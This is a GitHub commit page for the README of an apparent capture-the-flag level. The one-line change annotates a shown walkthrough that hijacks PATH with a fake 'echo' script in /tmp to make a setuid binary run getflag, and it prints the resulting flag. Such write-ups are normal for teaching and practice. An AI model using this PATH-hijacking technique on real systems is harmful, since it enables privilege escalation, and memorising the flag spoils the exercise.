Skip to content

Commit

Permalink
Update README.mdx
Browse files Browse the repository at this point in the history
  • Loading branch information
nuoxoxo authored Nov 16, 2024
1 parent 4bb8653 commit db0f3cc
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion level03/README.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,7 @@ getflag: /bin/getflag
```b
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
> chmod +x /tmp/echo
> export PATH=/tmp:$PATH
> export PATH=/tmp:$PATH 👈 prepend tmp to get it checked first
> ./level03
# qi0maab88jeaj46qoumi7maus
```
Expand Down

0 comments on commit db0f3cc

Please sign in to comment.